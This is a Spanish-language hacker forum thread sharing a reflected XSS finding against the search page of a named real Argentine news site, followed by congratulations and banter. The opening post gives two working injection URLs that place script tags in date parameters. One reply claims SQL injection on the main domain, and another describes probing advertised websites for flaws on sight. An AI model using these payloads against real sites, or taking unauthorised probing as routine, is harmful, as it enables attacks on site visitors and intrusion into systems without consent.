XSS Reflected clarin.com (El diario mas polemico de la argentina)

  • 8 Respuestas
  • 4548 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email



Url del sitio: http://buscador.clarin.com/

Vectores:
- http://buscador.clarin.com/video?from=01/01/2013&to=01/02/2013"><script>alert(/XSS/)</script>
- http://buscador.clarin.com/video?from=01/01/2013"><script>alert(/XSS/)</script>&to=01/02/2013

Autor: [Q]3rV[0]

Reportado: SI
« Última modificación: Enero 10, 2015, 12:52:40 pm por Expermicid »

Desconectado Cronos

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1000
  • Actividad:
    0%
  • Country: 00
  • Reputación 1
  • sudo su
    • Ver Perfil
    • Email
Hijo de su madre Clarin, el otro dia busque ahí y no encontré xD
Saludos,, Cronos.-

Desconectado Expermicid

  • *
  • Ex-Staff
  • *****
  • Mensajes: 463
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
  • Skype: expermicid.xd
    • Ver Perfil
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

jaja a mi me pasa igual, que cuando veo una propaganda y pasan la web, enseguida me pongo a buscar algun fallo en esa web

Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email
jajaja muy bueno! te felicito!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
También tiene SQL pero en el dominio principal.


Desconectado Alex

  • *
  • Colaborador
  • *
  • Mensajes: 857
  • Actividad:
    6.67%
  • Country: 00
  • Reputación 5
    • Ver Perfil
    • MI github
    • Email
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL

Desconectado Alex

  • *
  • Colaborador
  • *
  • Mensajes: 857
  • Actividad:
    6.67%
  • Country: 00
  • Reputación 5
    • Ver Perfil
    • MI github
    • Email
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL

es un decir, porque ilustrame como llamarías a la accion de realizar un xss en la pagina de clarin?

lo unico que se me ocurre es decirle

Citar
felicidades ahora eres partidario del gobierno, explotando vulnerabilidades en páginas de clarin jajajaj

cosa que en ese momento no se me ocurrió.

de todos modos cito la definición de wikipedia

Citar
Defacement es una palabra inglesa que significa desfiguración y es un término usado en informática para hacer referencia a la deformación o cambio producido de manera intencionada en una página web por un atacante que haya obtenido algún tipo de acceso a ella, bien por algún error de programación de la página, por algún bug en el propio servidor o por una mala administración de este. El autor de un defacement se denomina defacer.

esta definición nos ilustra, comentandonos que defacement se le podría llamar a una deformación en el sitio web, originalmente la idea del programador de clarin no era que muestre ese mensaje, entonces es una deformación, por más que sea reflejado, sigue siendo una deformación por tanto según wikipedia un deface.

http://es.wikipedia.org/wiki/Defacement

saludos!
« Última modificación: Febrero 02, 2013, 03:12:58 pm por [H]arkonnen »

 

XSS Reflected Error Based "Aerolineas Argentinas"

Iniciado por q3rv0

Respuestas: 3
Vistas: 3796
Último mensaje Septiembre 02, 2012, 04:46:33 pm
por ANTRAX
SQLI Direccion de Bienestar Fuerza Aerea Argentina

Iniciado por hdbreaker

Respuestas: 4
Vistas: 3203
Último mensaje Noviembre 26, 2012, 12:05:50 pm
por Alex
XSS Napsix Argentina

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2263
Último mensaje Agosto 27, 2012, 06:50:33 pm
por hdbreaker
XSS Tv Publica argentina

Iniciado por trackerkey

Respuestas: 2
Vistas: 2157
Último mensaje Enero 31, 2013, 01:32:39 am
por trackerkey
XSS reflected http://iphoneapplicationlist.com

Iniciado por q3rv0

Respuestas: 0
Vistas: 1736
Último mensaje Febrero 21, 2013, 02:57:18 pm
por q3rv0